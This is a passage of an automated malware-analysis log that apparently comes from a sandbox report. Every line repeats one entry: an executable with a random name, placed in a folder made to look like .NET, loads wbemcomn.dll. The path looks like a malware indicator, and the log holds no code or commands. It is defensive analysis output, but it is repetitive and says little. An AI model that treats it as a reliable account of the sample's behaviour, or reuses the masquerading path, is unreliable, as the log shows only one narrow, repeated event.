Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
